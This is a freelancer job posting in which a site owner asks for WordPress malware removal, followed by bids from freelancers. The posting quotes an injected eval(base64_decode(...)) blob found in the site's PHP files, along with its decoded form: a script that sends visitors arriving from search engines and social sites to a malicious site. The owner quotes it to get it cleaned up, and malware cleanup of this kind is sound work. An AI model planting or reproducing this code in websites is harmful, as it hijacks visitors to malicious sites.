Find Jobs
Hire Freelancers

wordpress virus removal

$30-250 CAD

In Progress
Posted over 11 years ago

$30-250 CAD

Paid on delivery
When I blog on my site [login to view URL] (or autopost via "Social Networks Auto Poster" widget) - it posts to my facebook. The shortened code (ex [login to view URL] ) leads to a malicious site I believe, ex [login to view URL] (oddly, on mobile devices, it correctly goes to my blog). I am not sure if this is the cause, however a previous person I hired noticed some code that shouldn't be there (in his words). Code is below. I would like to have the problem resolved, and also know how to prevent future such events from taking place? Below is what I've been told was found: "I believe your website might have been hacked. There is this type of code (see below) in several of the php files, which is not normally in the wordpress php files… it’s been my experience that when there is something like this .. the website has been hacked. The best I could do is remove all this code, but without fixing the security hole(s) the hackers will likely just put this code back in there. I am just letting you know, so that you can address the issue before it gets worse. eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9xcnVlLnFwb2UuY29tLyIpOwpleGl0KCk7DQp9Cn0NCn0NCn0NCn0=")); com] I base64_decoded that code it comes out to this (see below) but it basically looks like it might redirecting people to [login to view URL] (I didn’t go to this website because it is likely malicious) when they are referred to your website by search engines / facebook / myspace / etc. error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"[login to view URL]")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: [login to view URL]"); exit(); } } } }
Project ID: 4004917

About the project

9 proposals
Remote project
Active 11 yrs ago

Looking to make some money?

Benefits of bidding on Freelancer

Set your budget and timeframe
Get paid for your work
Outline your proposal
It's free to sign up and bid on jobs
Awarded to:
User Avatar
Hello, I can solve this problem faster and more effectively than any other contractor here. Please see my private message for more details.
$49 CAD in 1 day
4.9 (14 reviews)
4.6
4.6
9 freelancers are bidding on average $126 CAD for this job
User Avatar
Hi Charles, Good day! This is in response to the original project. Please check PM, I sent response there. Thanks!
$150 CAD in 1 day
4.9 (48 reviews)
5.2
5.2
User Avatar
hello, I've posted in your other project and I can do this job 100% sure. I'm ready to start right away. Best Regards. Dracco
$100 CAD in 1 day
4.9 (43 reviews)
4.9
4.9
User Avatar
------ 2YEARS EXPERIENCED PHP, WORDPRESS, CSS & WEB DEVELOPING EXPERT ------ ------ Your SATISFACTION is GUARANTEED with us ------
$100 CAD in 1 day
4.6 (15 reviews)
4.9
4.9
User Avatar
Hi, please see my profile for security related issues. Thank you.
$89 CAD in 1 day
5.0 (25 reviews)
4.6
4.6
User Avatar
Hi, I am expert with over 3 years of experience. I will provide best services. I have fixed such errors in past. Thanks
$150 CAD in 3 days
5.0 (9 reviews)
4.0
4.0
User Avatar
I'm ready to help you on this, please provide me everything so I can deliver this task immediately.....thanks
$175 CAD in 0 day
5.0 (11 reviews)
3.9
3.9
User Avatar
i am an experienced (mostly wordress) infection cleaner . i will clear your website from all malicious inserts and apply some patches i know to bugs that makes wordpress vulnerable to injection ( usually inside plugins ) . take my bid and consider it done . thank you , //liviu d
$120 CAD in 2 days
5.0 (4 reviews)
3.1
3.1
User Avatar
please check your private message inbox of the previous application of mine .... thanks for your time Aya
$100 CAD in 0 day
0.0 (0 reviews)
2.0
2.0
User Avatar
i can solve ur problem and i will make security system for ur web site to don't hack in future just contact me ....
$200 CAD in 3 days
0.0 (0 reviews)
0.0
0.0

About the client

Flag of CANADA
Kanata, Canada
5.0
5
Payment method verified
Member since Nov 11, 2012

Client Verification

Thanks! We’ve emailed you a link to claim your free credit.
Something went wrong while sending your email. Please try again.
Registered Users Total Jobs Posted
Freelancer ® is a registered Trademark of Freelancer Technology Pty Limited (ACN 142 189 759)
Copyright © 2024 Freelancer Technology Pty Limited (ACN 142 189 759)
Loading preview
Permission granted for Geolocation.
Your login session has expired and you have been logged out. Please log in again.